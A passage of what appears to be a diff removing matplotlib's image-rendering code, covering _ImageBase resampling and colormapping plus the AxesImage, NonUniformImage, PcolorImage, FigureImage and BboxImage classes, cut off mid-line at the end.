axes. It should not be used if exact scaling is - needed, such as for `FigureImage`. - - Returns - ------- - image : (M, N, 4) `numpy.uint8` array - The RGBA image, resampled unless *unsampled* is True. - x, y : float - The upper left corner where the image should be drawn, in pixel - space. - trans : `~matplotlib.transforms.Affine2D` - The affine transformation from image to pixel space. - """ - if A is None: - raise RuntimeError('You must first set the image ' - 'array or the image attribute') - if A.size == 0: - raise RuntimeError("_make_image must get a non-empty image. " - "Your Artist's draw method must filter before " - "this method is called.") - - clipped_bbox = Bbox.intersection(out_bbox, clip_bbox) - - if clipped_bbox is None: - return None, 0, 0, None - - out_width_base = clipped_bbox.width * magnification - out_height_base = clipped_bbox.height * magnification - - if out_width_base == 0 or out_height_base == 0: - return None, 0, 0, None - - if self.origin == 'upper': - # Flip the input image using a transform. This avoids the - # problem with flipping the array, which results in a copy - # when it is converted to contiguous in the C wrapper - t0 = Affine2D().translate(0, -A.shape[0]).scale(1, -1) - else: - t0 = IdentityTransform() - - t0 += ( - Affine2D() - .scale( - in_bbox.width / A.shape[1], - in_bbox.height / A.shape[0]) - .translate(in_bbox.x0, in_bbox.y0) - + self.get_transform()) - - t = (t0 - + (Affine2D() - .translate(-clipped_bbox.x0, -clipped_bbox.y0) - .scale(magnification))) - - # So that the image is aligned with the edge of the axes, we want to - # round up the output width to the next integer. This also means - # scaling the transform slightly to account for the extra subpixel. - if ((not unsampled) and t.is_affine and round_to_pixel_border and - (out_width_base % 1.0 != 0.0 or out_height_base % 1.0 != 0.0)): - out_width = math.ceil(out_width_base) - out_height = math.ceil(out_height_base) - extra_width = (out_width - out_width_base) / out_width_base - extra_height = (out_height - out_height_base) / out_height_base - t += Affine2D().scale(1.0 + extra_width, 1.0 + extra_height) - else: - out_width = int(out_width_base) - out_height = int(out_height_base) - out_shape = (out_height, out_width) - - if not unsampled: - if not (A.ndim == 2 or A.ndim == 3 and A.shape[-1] in (3, 4)): - raise ValueError(f"Invalid shape {A.shape} for image data") - if A.ndim == 2 and self._interpolation_stage != 'rgba': - # if we are a 2D array, then we are running through the - # norm + colormap transformation. However, in general the - # input data is not going to match the size on the screen so we - # have to resample to the correct number of pixels - - # TODO slice input array first - a_min = A.min() - a_max = A.max() - if a_min is np.ma.masked: # All masked; values don't matter. - a_min, a_max = np.int32(0), np.int32(1) - if A.dtype.kind == 'f': # Float dtype: scale to same dtype. - scaled_dtype = np.dtype( - np.float64 if A.dtype.itemsize > 4 else np.float32) - if scaled_dtype.itemsize < A.dtype.itemsize: - _api.warn_external(f"Casting input data from {A.dtype}" - f" to {scaled_dtype} for imshow.") - else: # Int dtype, likely. - # Scale to appropriately sized float: use float32 if the - # dynamic range is small, to limit the memory footprint. - da = a_max.astype(np.float64) - a_min.astype(np.float64) - scaled_dtype = np.float64 if da > 1e8 else np.float32 - - # Scale the input data to [.1, .9]. The Agg interpolators clip - # to [0, 1] internally, and we use a smaller input scale to - # identify the interpolated points that need to be flagged as - # over/under. This may introduce numeric instabilities in very - # broadly scaled data. - - # Always copy, and don't allow array subtypes. - A_scaled = np.array(A, dtype=scaled_dtype) - # Clip scaled data around norm if necessary. This is necessary - # for big numbers at the edge of float64's ability to represent - # changes. Applying a norm first would be good, but ruins the - # interpolation of over numbers. - self.norm.autoscale_None(A) - dv = np.float64(self.norm.vmax) - np.float64(self.norm.vmin) - vmid = np.float64(self.norm.vmin) + dv / 2 - fact = 1e7 if scaled_dtype == np.float64 else 1e4 - newmin = vmid - dv * fact - if newmin < a_min: - newmin = None - else: - a_min = np.float64(newmin) - newmax = vmid + dv * fact - if newmax > a_max: - newmax = None - else: - a_max = np.float64(newmax) - if newmax is not None or newmin is not None: - np.clip(A_scaled, newmin, newmax, out=A_scaled) - - # Rescale the raw data to [offset, 1-offset] so that the - # resampling code will run cleanly. Using dyadic numbers here - # could reduce the error, but would not fully eliminate it and - # breaks a number of tests (due to the slightly different - # error bouncing some pixels across a boundary in the (very - # quantized) colormapping step). - offset = .1 - frac = .8 - # Run vmin/vmax through the same rescaling as the raw data; - # otherwise, data values close or equal to the boundaries can - # end up on the wrong side due to floating point error. - vmin, vmax = self.norm.vmin, self.norm.vmax - if vmin is np.ma.masked: - vmin, vmax = a_min, a_max - vrange = np.array([vmin, vmax], dtype=scaled_dtype) - - A_scaled -= a_min - vrange -= a_min - # .item() handles a_min/a_max being ndarray subclasses. - a_min = a_min.astype(scaled_dtype).item() - a_max = a_max.astype(scaled_dtype).item() - - if a_min != a_max: - A_scaled /= ((a_max - a_min) / frac) - vrange /= ((a_max - a_min) / frac) - A_scaled += offset - vrange += offset - # resample the input data to the correct resolution and shape - A_resampled = _resample(self, A_scaled, out_shape, t) - del A_scaled # Make sure we don't use A_scaled anymore! - # Un-scale the resampled data to approximately the original - # range. Things that interpolated to outside the original range - # will still be outside, but possibly clipped in the case of - # higher order interpolation + drastically changing data. - A_resampled -= offset - vrange -= offset - if a_min != a_max: - A_resampled *= ((a_max - a_min) / frac) - vrange *= ((a_max - a_min) / frac) - A_resampled += a_min - vrange += a_min - # if using NoNorm, cast back to the original datatype - if isinstance(self.norm, mcolors.NoNorm): - A_resampled = A_resampled.astype(A.dtype) - - mask = (np.where(A.mask, np.float32(np.nan), np.float32(1)) - if A.mask.shape == A.shape # nontrivial mask - else np.ones_like(A, np.float32)) - # we always have to interpolate the mask to account for - # non-affine transformations - out_alpha = _resample(self, mask, out_shape, t, resample=True) - del mask # Make sure we don't use mask anymore! - # Agg updates out_alpha in place. If the pixel has no image - # data it will not be updated (and still be 0 as we initialized - # it), if input data that would go into that output pixel than - # it will be `nan`, if all the input data for a pixel is good - # it will be 1, and if there is _some_ good data in that output - # pixel it will be between [0, 1] (such as a rotated image). - out_mask = np.isnan(out_alpha) - out_alpha[out_mask] = 1 - # Apply the pixel-by-pixel alpha values if present - alpha = self.get_alpha() - if alpha is not None and np.ndim(alpha) > 0: - out_alpha *= _resample(self, alpha, out_shape, - t, resample=True) - # mask and run through the norm - resampled_masked = np.ma.masked_array(A_resampled, out_mask) - # we have re-set the vmin/vmax to account for small errors - # that may have moved input values in/out of range - s_vmin, s_vmax = vrange - if isinstance(self.norm, mcolors.LogNorm) and s_vmin <= 0: - # Don't give 0 or negative values to LogNorm - s_vmin = np.finfo(scaled_dtype).eps - # Block the norm from sending an update signal during the - # temporary vmin/vmax change - with self.norm.callbacks.blocked(), \ - cbook._setattr_cm(self.norm, vmin=s_vmin, vmax=s_vmax): - output = self.norm(resampled_masked) - else: - if A.ndim == 2: # _interpolation_stage == 'rgba' - self.norm.autoscale_None(A) - A = self.to_rgba(A) - if A.shape[2] == 3: - A = _rgb_to_rgba(A) - alpha = self._get_scalar_alpha() - output_alpha = _resample( # resample alpha channel - self, A[..., 3], out_shape, t, alpha=alpha) - output = _resample( # resample rgb channels - self, _rgb_to_rgba(A[..., :3]), out_shape, t, alpha=alpha) - output[..., 3] = output_alpha # recombine rgb and alpha - - # output is now either a 2D array of normed (int or float) data - # or an RGBA array of re-sampled input - output = self.to_rgba(output, bytes=True, norm=False) - # output is now a correctly sized RGBA array of uint8 - - # Apply alpha *after* if the input was greyscale without a mask - if A.ndim == 2: - alpha = self._get_scalar_alpha() - alpha_channel = output[:, :, 3] - alpha_channel[:] = ( # Assignment will cast to uint8. - alpha_channel.astype(np.float32) * out_alpha * alpha) - - else: - if self._imcache is None: - self._imcache = self.to_rgba(A, bytes=True, norm=(A.ndim == 2)) - output = self._imcache - - # Subset the input image to only the part that will be displayed. - subset = TransformedBbox(clip_bbox, t0.inverted()).frozen() - output = output[ - int(max(subset.ymin, 0)): - int(min(subset.ymax + 1, output.shape[0])), - int(max(subset.xmin, 0)): - int(min(subset.xmax + 1, output.shape[1]))] - - t = Affine2D().translate( - int(max(subset.xmin, 0)), int(max(subset.ymin, 0))) + t - - return output, clipped_bbox.x0, clipped_bbox.y0, t - - def make_image(self, renderer, magnification=1.0, unsampled=False): - """ - Normalize, rescale, and colormap this image's data for rendering using - *renderer*, with the given *magnification*. - - If *unsampled* is True, the image will not be scaled, but an - appropriate affine transformation will be returned instead. - - Returns - ------- - image : (M, N, 4) `numpy.uint8` array - The RGBA image, resampled unless *unsampled* is True. - x, y : float - The upper left corner where the image should be drawn, in pixel - space. - trans : `~matplotlib.transforms.Affine2D` - The affine transformation from image to pixel space. - """ - raise NotImplementedError('The make_image method must be overridden') - - def _check_unsampled_image(self): - """ - Return whether the image is better to be drawn unsampled. - - The derived class needs to override it. - """ - return False - - @martist.allow_rasterization - def draw(self, renderer, *args, **kwargs): - # if not visible, declare victory and return - if not self.get_visible(): - self.stale = False - return - # for empty images, there is nothing to draw! - if self.get_array().size == 0: - self.stale = False - return - # actually render the image. - gc = renderer.new_gc() - self._set_gc_clip(gc) - gc.set_alpha(self._get_scalar_alpha()) - gc.set_url(self.get_url()) - gc.set_gid(self.get_gid()) - if (renderer.option_scale_image() # Renderer supports transform kwarg. - and self._check_unsampled_image() - and self.get_transform().is_affine): - im, l, b, trans = self.make_image(renderer, unsampled=True) - if im is not None: - trans = Affine2D().scale(im.shape[1], im.shape[0]) + trans - renderer.draw_image(gc, l, b, im, trans) - else: - im, l, b, trans = self.make_image( - renderer, renderer.get_image_magnification()) - if im is not None: - renderer.draw_image(gc, l, b, im) - gc.restore() - self.stale = False - - def contains(self, mouseevent): - """Test whether the mouse event occurred within the image.""" - if (self._different_canvas(mouseevent) - # This doesn't work for figimage. - or not self.axes.contains(mouseevent)[0]): - return False, {} - # TODO: make sure this is consistent with patch and patch - # collection on nonlinear transformed coordinates. - # TODO: consider returning image coordinates (shouldn't - # be too difficult given that the image is rectilinear - trans = self.get_transform().inverted() - x, y = trans.transform([mouseevent.x, mouseevent.y]) - xmin, xmax, ymin, ymax = self.get_extent() - # This checks xmin <= x <= xmax *or* xmax <= x <= xmin. - inside = (x is not None and (x - xmin) * (x - xmax) <= 0 - and y is not None and (y - ymin) * (y - ymax) <= 0) - return inside, {} - - def write_png(self, fname): - """Write the image to png file *fname*.""" - im = self.to_rgba(self._A[::-1] if self.origin == 'lower' else self._A, - bytes=True, norm=True) - PIL.Image.fromarray(im).save(fname, format="png") - - @staticmethod - def _normalize_image_array(A): - """ - Check validity of image-like input *A* and normalize it to a format suitable for - Image subclasses. - """ - A = cbook.safe_masked_invalid(A, copy=True) - if A.dtype != np.uint8 and not np.can_cast(A.dtype, float, "same_kind"): - raise TypeError(f"Image data of dtype {A.dtype} cannot be " - f"converted to float") - if A.ndim == 3 and A.shape[-1] == 1: - A = A.squeeze(-1) # If just (M, N, 1), assume scalar and apply colormap. - if not (A.ndim == 2 or A.ndim == 3 and A.shape[-1] in [3, 4]): - raise TypeError(f"Invalid shape {A.shape} for image data") - if A.ndim == 3: - # If the input data has values outside the valid range (after - # normalisation), we issue a warning and then clip X to the bounds - # - otherwise casting wraps extreme values, hiding outliers and - # making reliable interpretation impossible. - high = 255 if np.issubdtype(A.dtype, np.integer) else 1 - if A.min() < 0 or high < A.max(): - _log.warning( - 'Clipping input data to the valid range for imshow with ' - 'RGB data ([0..1] for floats or [0..255] for integers).' - ) - A = np.clip(A, 0, high) - # Cast unsupported integer types to uint8 - if A.dtype != np.uint8 and np.issubdtype(A.dtype, np.integer): - A = A.astype(np.uint8) - return A - - def set_data(self, A): - """ - Set the image array. - - Note that this function does *not* update the normalization used. - - Parameters - ---------- - A : array-like or `PIL.Image.Image` - """ - if isinstance(A, PIL.Image.Image): - A = pil_to_array(A) # Needed e.g. to apply png palette. - self._A = self._normalize_image_array(A) - self._imcache = None - self.stale = True - - def set_array(self, A): - """ - Retained for backwards compatibility - use set_data instead. - - Parameters - ---------- - A : array-like - """ - # This also needs to be here to override the inherited - # cm.ScalarMappable.set_array method so it is not invoked by mistake. - self.set_data(A) - - def get_interpolation(self): - """ - Return the interpolation method the image uses when resizing. - - One of 'antialiased', 'nearest', 'bilinear', 'bicubic', 'spline16', - 'spline36', 'hanning', 'hamming', 'hermite', 'kaiser', 'quadric', - 'catrom', 'gaussian', 'bessel', 'mitchell', 'sinc', 'lanczos', - or 'none'. - """ - return self._interpolation - - def set_interpolation(self, s): - """ - Set the interpolation method the image uses when resizing. - - If None, use :rc:`image.interpolation`. If 'none', the image is - shown as is without interpolating. 'none' is only supported in - agg, ps and pdf backends and will fall back to 'nearest' mode - for other backends. - - Parameters - ---------- - s : {'antialiased', 'nearest', 'bilinear', 'bicubic', 'spline16', \ -'spline36', 'hanning', 'hamming', 'hermite', 'kaiser', 'quadric', 'catrom', \ -'gaussian', 'bessel', 'mitchell', 'sinc', 'lanczos', 'none'} or None - """ - s = mpl._val_or_rc(s, 'image.interpolation').lower() - _api.check_in_list(interpolations_names, interpolation=s) - self._interpolation = s - self.stale = True - - def set_interpolation_stage(self, s): - """ - Set when interpolation happens during the transform to RGBA. - - Parameters - ---------- - s : {'data', 'rgba'} or None - Whether to apply up/downsampling interpolation in data or RGBA - space. - """ - if s is None: - s = "data" # placeholder for maybe having rcParam - _api.check_in_list(['data', 'rgba'], s=s) - self._interpolation_stage = s - self.stale = True - - def can_composite(self): - """Return whether the image can be composited with its neighbors.""" - trans = self.get_transform() - return ( - self._interpolation != 'none' and - trans.is_affine and - trans.is_separable) - - def set_resample(self, v): - """ - Set whether image resampling is used. - - Parameters - ---------- - v : bool or None - If None, use :rc:`image.resample`. - """ - v = mpl._val_or_rc(v, 'image.resample') - self._resample = v - self.stale = True - - def get_resample(self): - """Return whether image resampling is used.""" - return self._resample - - def set_filternorm(self, filternorm): - """ - Set whether the resize filter normalizes the weights. - - See help for `~.Axes.imshow`. - - Parameters - ---------- - filternorm : bool - """ - self._filternorm = bool(filternorm) - self.stale = True - - def get_filternorm(self): - """Return whether the resize filter normalizes the weights.""" - return self._filternorm - - def set_filterrad(self, filterrad): - """ - Set the resize filter radius only applicable to some - interpolation schemes -- see help for imshow - - Parameters - ---------- - filterrad : positive float - """ - r = float(filterrad) - if r <= 0: - raise ValueError("The filter radius must be a positive number") - self._filterrad = r - self.stale = True - - def get_filterrad(self): - """Return the filterrad setting.""" - return self._filterrad - - -class AxesImage(_ImageBase): - """ - An image attached to an Axes. - - Parameters - ---------- - ax : `~matplotlib.axes.Axes` - The axes the image will belong to. - cmap : str or `~matplotlib.colors.Colormap`, default: :rc:`image.cmap` - The Colormap instance or registered colormap name used to map scalar - data to colors. - norm : str or `~matplotlib.colors.Normalize` - Maps luminance to 0-1. - interpolation : str, default: :rc:`image.interpolation` - Supported values are 'none', 'antialiased', 'nearest', 'bilinear', - 'bicubic', 'spline16', 'spline36', 'hanning', 'hamming', 'hermite', - 'kaiser', 'quadric', 'catrom', 'gaussian', 'bessel', 'mitchell', - 'sinc', 'lanczos', 'blackman'. - interpolation_stage : {'data', 'rgba'}, default: 'data' - If 'data', interpolation - is carried out on the data provided by the user. If 'rgba', the - interpolation is carried out after the colormapping has been - applied (visual interpolation). - origin : {'upper', 'lower'}, default: :rc:`image.origin` - Place the [0, 0] index of the array in the upper left or lower left - corner of the axes. The convention 'upper' is typically used for - matrices and images. - extent : tuple, optional - The data axes (left, right, bottom, top) for making image plots - registered with data plots. Default is to label the pixel - centers with the zero-based row and column indices. - filternorm : bool, default: True - A parameter for the antigrain image resize filter - (see the antigrain documentation). - If filternorm is set, the filter normalizes integer values and corrects - the rounding errors. It doesn't do anything with the source floating - point values, it corrects only integers according to the rule of 1.0 - which means that any sum of pixel weights must be equal to 1.0. So, - the filter function must produce a graph of the proper shape. - filterrad : float > 0, default: 4 - The filter radius for filters that have a radius parameter, i.e. when - interpolation is one of: 'sinc', 'lanczos' or 'blackman'. - resample : bool, default: False - When True, use a full resampling method. When False, only resample when - the output image is larger than the input image. - **kwargs : `~matplotlib.artist.Artist` properties - """ - - def __init__(self, ax, - *, - cmap=None, - norm=None, - interpolation=None, - origin=None, - extent=None, - filternorm=True, - filterrad=4.0, - resample=False, - interpolation_stage=None, - **kwargs - ): - - self._extent = extent - - super().__init__( - ax, - cmap=cmap, - norm=norm, - interpolation=interpolation, - origin=origin, - filternorm=filternorm, - filterrad=filterrad, - resample=resample, - interpolation_stage=interpolation_stage, - **kwargs - ) - - def get_window_extent(self, renderer=None): - x0, x1, y0, y1 = self._extent - bbox = Bbox.from_extents([x0, y0, x1, y1]) - return bbox.transformed(self.get_transform()) - - def make_image(self, renderer, magnification=1.0, unsampled=False): - # docstring inherited - trans = self.get_transform() - # image is created in the canvas coordinate. - x1, x2, y1, y2 = self.get_extent() - bbox = Bbox(np.array([[x1, y1], [x2, y2]])) - transformed_bbox = TransformedBbox(bbox, trans) - clip = ((self.get_clip_box() or self.axes.bbox) if self.get_clip_on() - else self.figure.bbox) - return self._make_image(self._A, bbox, transformed_bbox, clip, - magnification, unsampled=unsampled) - - def _check_unsampled_image(self): - """Return whether the image would be better drawn unsampled.""" - return self.get_interpolation() == "none" - - def set_extent(self, extent, **kwargs): - """ - Set the image extent. - - Parameters - ---------- - extent : 4-tuple of float - The position and size of the image as tuple - ``(left, right, bottom, top)`` in data coordinates. - **kwargs - Other parameters from which unit info (i.e., the *xunits*, - *yunits*, *zunits* (for 3D axes), *runits* and *thetaunits* (for - polar axes) entries are applied, if present. - - Notes - ----- - This updates ``ax.dataLim``, and, if autoscaling, sets ``ax.viewLim`` - to tightly fit the image, regardless of ``dataLim``. Autoscaling - state is not changed, so following this with ``ax.autoscale_view()`` - will redo the autoscaling in accord with ``dataLim``. - """ - (xmin, xmax), (ymin, ymax) = self.axes._process_unit_info( - [("x", [extent[0], extent[1]]), - ("y", [extent[2], extent[3]])], - kwargs) - if kwargs: - raise _api.kwarg_error("set_extent", kwargs) - xmin = self.axes._validate_converted_limits( - xmin, self.convert_xunits) - xmax = self.axes._validate_converted_limits( - xmax, self.convert_xunits) - ymin = self.axes._validate_converted_limits( - ymin, self.convert_yunits) - ymax = self.axes._validate_converted_limits( - ymax, self.convert_yunits) - extent = [xmin, xmax, ymin, ymax] - - self._extent = extent - corners = (xmin, ymin), (xmax, ymax) - self.axes.update_datalim(corners) - self.sticky_edges.x[:] = [xmin, xmax] - self.sticky_edges.y[:] = [ymin, ymax] - if self.axes.get_autoscalex_on(): - self.axes.set_xlim((xmin, xmax), auto=None) - if self.axes.get_autoscaley_on(): - self.axes.set_ylim((ymin, ymax), auto=None) - self.stale = True - - def get_extent(self): - """Return the image extent as tuple (left, right, bottom, top).""" - if self._extent is not None: - return self._extent - else: - sz = self.get_size() - numrows, numcols = sz - if self.origin == 'upper': - return (-0.5, numcols-0.5, numrows-0.5, -0.5) - else: - return (-0.5, numcols-0.5, -0.5, numrows-0.5) - - def get_cursor_data(self, event): - """ - Return the image value at the event position or *None* if the event is - outside the image. - - See Also - -------- - matplotlib.artist.Artist.get_cursor_data - """ - xmin, xmax, ymin, ymax = self.get_extent() - if self.origin == 'upper': - ymin, ymax = ymax, ymin - arr = self.get_array() - data_extent = Bbox([[xmin, ymin], [xmax, ymax]]) - array_extent = Bbox([[0, 0], [arr.shape[1], arr.shape[0]]]) - trans = self.get_transform().inverted() - trans += BboxTransform(boxin=data_extent, boxout=array_extent) - point = trans.transform([event.x, event.y]) - if any(np.isnan(point)): - return None - j, i = point.astype(int) - # Clip the coordinates at array bounds - if not (0 <= i < arr.shape[0]) or not (0 <= j < arr.shape[1]): - return None - else: - return arr[i, j] - - -class NonUniformImage(AxesImage): - mouseover = False # This class still needs its own get_cursor_data impl. - - def __init__(self, ax, *, interpolation='nearest', **kwargs): - """ - Parameters - ---------- - ax : `~matplotlib.axes.Axes` - The axes the image will belong to. - interpolation : {'nearest', 'bilinear'}, default: 'nearest' - The interpolation scheme used in the resampling. - **kwargs - All other keyword arguments are identical to those of `.AxesImage`. - """ - super().__init__(ax, **kwargs) - self.set_interpolation(interpolation) - - def _check_unsampled_image(self): - """Return False. Do not use unsampled image.""" - return False - - def make_image(self, renderer, magnification=1.0, unsampled=False): - # docstring inherited - if self._A is None: - raise RuntimeError('You must first set the image array') - if unsampled: - raise ValueError('unsampled not supported on NonUniformImage') - A = self._A - if A.ndim == 2: - if A.dtype != np.uint8: - A = self.to_rgba(A, bytes=True) - else: - A = np.repeat(A[:, :, np.newaxis], 4, 2) - A[:, :, 3] = 255 - else: - if A.dtype != np.uint8: - A = (255*A).astype(np.uint8) - if A.shape[2] == 3: - B = np.zeros(tuple([*A.shape[0:2], 4]), np.uint8) - B[:, :, 0:3] = A - B[:, :, 3] = 255 - A = B - vl = self.axes.viewLim - l, b, r, t = self.axes.bbox.extents - width = int(((round(r) + 0.5) - (round(l) - 0.5)) * magnification) - height = int(((round(t) + 0.5) - (round(b) - 0.5)) * magnification) - x_pix = np.linspace(vl.x0, vl.x1, width) - y_pix = np.linspace(vl.y0, vl.y1, height) - if self._interpolation == "nearest": - x_mid = (self._Ax[:-1] + self._Ax[1:]) / 2 - y_mid = (self._Ay[:-1] + self._Ay[1:]) / 2 - x_int = x_mid.searchsorted(x_pix) - y_int = y_mid.searchsorted(y_pix) - # The following is equal to `A[y_int[:, None], x_int[None, :]]`, - # but many times faster. Both casting to uint32 (to have an - # effectively 1D array) and manual index flattening matter. - im = ( - np.ascontiguousarray(A).view(np.uint32).ravel()[ - np.add.outer(y_int * A.shape[1], x_int)] - .view(np.uint8).reshape((height, width, 4))) - else: # self._interpolation == "bilinear" - # Use np.interp to compute x_int/x_float has similar speed. - x_int = np.clip( - self._Ax.searchsorted(x_pix) - 1, 0, len(self._Ax) - 2) - y_int = np.clip( - self._Ay.searchsorted(y_pix) - 1, 0, len(self._Ay) - 2) - idx_int = np.add.outer(y_int * A.shape[1], x_int) - x_frac = np.clip( - np.divide(x_pix - self._Ax[x_int], np.diff(self._Ax)[x_int], - dtype=np.float32), # Downcasting helps with speed. - 0, 1) - y_frac = np.clip( - np.divide(y_pix - self._Ay[y_int], np.diff(self._Ay)[y_int], - dtype=np.float32), - 0, 1) - f00 = np.outer(1 - y_frac, 1 - x_frac) - f10 = np.outer(y_frac, 1 - x_frac) - f01 = np.outer(1 - y_frac, x_frac) - f11 = np.outer(y_frac, x_frac) - im = np.empty((height, width, 4), np.uint8) - for chan in range(4): - ac = A[:, :, chan].reshape(-1) # reshape(-1) avoids a copy. - # Shifting the buffer start (`ac[offset:]`) avoids an array - # addition (`ac[idx_int + offset]`). - buf = f00 * ac[idx_int] - buf += f10 * ac[A.shape[1]:][idx_int] - buf += f01 * ac[1:][idx_int] - buf += f11 * ac[A.shape[1] + 1:][idx_int] - im[:, :, chan] = buf # Implicitly casts to uint8. - return im, l, b, IdentityTransform() - - def set_data(self, x, y, A): - """ - Set the grid for the pixel centers, and the pixel values. - - Parameters - ---------- - x, y : 1D array-like - Monotonic arrays of shapes (N,) and (M,), respectively, specifying - pixel centers. - A : array-like - (M, N) `~numpy.ndarray` or masked array of values to be - colormapped, or (M, N, 3) RGB array, or (M, N, 4) RGBA array. - """ - A = self._normalize_image_array(A) - x = np.array(x, np.float32) - y = np.array(y, np.float32) - if not (x.ndim == y.ndim == 1 and A.shape[:2] == y.shape + x.shape): - raise TypeError("Axes don't match array shape") - self._A = A - self._Ax = x - self._Ay = y - self._imcache = None - self.stale = True - - def set_array(self, *args): - raise NotImplementedError('Method not supported') - - def set_interpolation(self, s): - """ - Parameters - ---------- - s : {'nearest', 'bilinear'} or None - If None, use :rc:`image.interpolation`. - """ - if s is not None and s not in ('nearest', 'bilinear'): - raise NotImplementedError('Only nearest neighbor and ' - 'bilinear interpolations are supported') - super().set_interpolation(s) - - def get_extent(self): - if self._A is None: - raise RuntimeError('Must set data first') - return self._Ax[0], self._Ax[-1], self._Ay[0], self._Ay[-1] - - @_api.rename_parameter("3.8", "s", "filternorm") - def set_filternorm(self, filternorm): - pass - - @_api.rename_parameter("3.8", "s", "filterrad") - def set_filterrad(self, filterrad): - pass - - def set_norm(self, norm): - if self._A is not None: - raise RuntimeError('Cannot change colors after loading data') - super().set_norm(norm) - - def set_cmap(self, cmap): - if self._A is not None: - raise RuntimeError('Cannot change colors after loading data') - super().set_cmap(cmap) - - -class PcolorImage(AxesImage): - """ - Make a pcolor-style plot with an irregular rectangular grid. - - This uses a variation of the original irregular image code, - and it is used by pcolorfast for the corresponding grid type. - """ - - def __init__(self, ax, - x=None, - y=None, - A=None, - *, - cmap=None, - norm=None, - **kwargs - ): - """ - Parameters - ---------- - ax : `~matplotlib.axes.Axes` - The axes the image will belong to. - x, y : 1D array-like, optional - Monotonic arrays of length N+1 and M+1, respectively, specifying - rectangle boundaries. If not given, will default to - ``range(N + 1)`` and ``range(M + 1)``, respectively. - A : array-like - The data to be color-coded. The interpretation depends on the - shape: - - - (M, N) `~numpy.ndarray` or masked array: values to be colormapped - - (M, N, 3): RGB array - - (M, N, 4): RGBA array - - cmap : str or `~matplotlib.colors.Colormap`, default: :rc:`image.cmap` - The Colormap instance or registered colormap name used to map - scalar data to colors. - norm : str or `~matplotlib.colors.Normalize` - Maps luminance to 0-1. - **kwargs : `~matplotlib.artist.Artist` properties - """ - super().__init__(ax, norm=norm, cmap=cmap) - self._internal_update(kwargs) - if A is not None: - self.set_data(x, y, A) - - def make_image(self, renderer, magnification=1.0, unsampled=False): - # docstring inherited - if self._A is None: - raise RuntimeError('You must first set the image array') - if unsampled: - raise ValueError('unsampled not supported on PColorImage') - - if self._imcache is None: - A = self.to_rgba(self._A, bytes=True) - self._imcache = np.pad(A, [(1, 1), (1, 1), (0, 0)], "constant") - padded_A = self._imcache - bg = mcolors.to_rgba(self.axes.patch.get_facecolor(), 0) - bg = (np.array(bg) * 255).astype(np.uint8) - if (padded_A[0, 0] != bg).all(): - padded_A[[0, -1], :] = padded_A[:, [0, -1]] = bg - - l, b, r, t = self.axes.bbox.extents - width = (round(r) + 0.5) - (round(l) - 0.5) - height = (round(t) + 0.5) - (round(b) - 0.5) - width = round(width * magnification) - height = round(height * magnification) - vl = self.axes.viewLim - - x_pix = np.linspace(vl.x0, vl.x1, width) - y_pix = np.linspace(vl.y0, vl.y1, height) - x_int = self._Ax.searchsorted(x_pix) - y_int = self._Ay.searchsorted(y_pix) - im = ( # See comment in NonUniformImage.make_image re: performance. - padded_A.view(np.uint32).ravel()[ - np.add.outer(y_int * padded_A.shape[1], x_int)] - .view(np.uint8).reshape((height, width, 4))) - return im, l, b, IdentityTransform() - - def _check_unsampled_image(self): - return False - - def set_data(self, x, y, A): - """ - Set the grid for the rectangle boundaries, and the data values. - - Parameters - ---------- - x, y : 1D array-like, optional - Monotonic arrays of length N+1 and M+1, respectively, specifying - rectangle boundaries. If not given, will default to - ``range(N + 1)`` and ``range(M + 1)``, respectively. - A : array-like - The data to be color-coded. The interpretation depends on the - shape: - - - (M, N) `~numpy.ndarray` or masked array: values to be colormapped - - (M, N, 3): RGB array - - (M, N, 4): RGBA array - """ - A = self._normalize_image_array(A) - x = np.arange(0., A.shape[1] + 1) if x is None else np.array(x, float).ravel() - y = np.arange(0., A.shape[0] + 1) if y is None else np.array(y, float).ravel() - if A.shape[:2] != (y.size - 1, x.size - 1): - raise ValueError( - "Axes don't match array shape. Got %s, expected %s." % - (A.shape[:2], (y.size - 1, x.size - 1))) - # For efficient cursor readout, ensure x and y are increasing. - if x[-1] < x[0]: - x = x[::-1] - A = A[:, ::-1] - if y[-1] < y[0]: - y = y[::-1] - A = A[::-1] - self._A = A - self._Ax = x - self._Ay = y - self._imcache = None - self.stale = True - - def set_array(self, *args): - raise NotImplementedError('Method not supported') - - def get_cursor_data(self, event): - # docstring inherited - x, y = event.xdata, event.ydata - if (x < self._Ax[0] or x > self._Ax[-1] or - y < self._Ay[0] or y > self._Ay[-1]): - return None - j = np.searchsorted(self._Ax, x) - 1 - i = np.searchsorted(self._Ay, y) - 1 - try: - return self._A[i, j] - except IndexError: - return None - - -class FigureImage(_ImageBase): - """An image attached to a figure.""" - - zorder = 0 - - _interpolation = 'nearest' - - def __init__(self, fig, - *, - cmap=None, - norm=None, - offsetx=0, - offsety=0, - origin=None, - **kwargs - ): - """ - cmap is a colors.Colormap instance - norm is a colors.Normalize instance to map luminance to 0-1 - - kwargs are an optional list of Artist keyword args - """ - super().__init__( - None, - norm=norm, - cmap=cmap, - origin=origin - ) - self.figure = fig - self.ox = offsetx - self.oy = offsety - self._internal_update(kwargs) - self.magnification = 1.0 - - def get_extent(self): - """Return the image extent as tuple (left, right, bottom, top).""" - numrows, numcols = self.get_size() - return (-0.5 + self.ox, numcols-0.5 + self.ox, - -0.5 + self.oy, numrows-0.5 + self.oy) - - def make_image(self, renderer, magnification=1.0, unsampled=False): - # docstring inherited - fac = renderer.dpi/self.figure.dpi - # fac here is to account for pdf, eps, svg backends where - # figure.dpi is set to 72. This means we need to scale the - # image (using magnification) and offset it appropriately. - bbox = Bbox([[self.ox/fac, self.oy/fac], - [(self.ox/fac + self._A.shape[1]), - (self.oy/fac + self._A.shape[0])]]) - width, height = self.figure.get_size_inches() - width *= renderer.dpi - height *= renderer.dpi - clip = Bbox([[0, 0], [width, height]]) - return self._make_image( - self._A, bbox, bbox, clip, magnification=magnification / fac, - unsampled=unsampled, round_to_pixel_border=False) - - def set_data(self, A): - """Set the image array.""" - cm.ScalarMappable.set_array(self, A) - self.stale = True - - -class BboxImage(_ImageBase): - """The Image class whose size is determined by the given bbox.""" - - def __init__(self, bbox, - *, - cmap=None, - norm=None, - interpolation=None, - origin=None, - filternorm=True, - filterrad=4.0, - resample=False, - **kwargs - ): - """ - cmap is a colors.Colormap instance - norm is a colors.Normalize instance to map luminance to 0-1 - - kwargs are an optional list of Artist keyword args - """ - super().__init__( - None, - cmap=cmap, - norm=norm, - interpolation=interpolation, - origin=origin, - filternorm=filternorm, - filterrad=filterrad, - resample=resample, - **kwargs - ) - self.bbox = bbox - - def get_window_extent(self, renderer=None): - if renderer is None: - renderer = 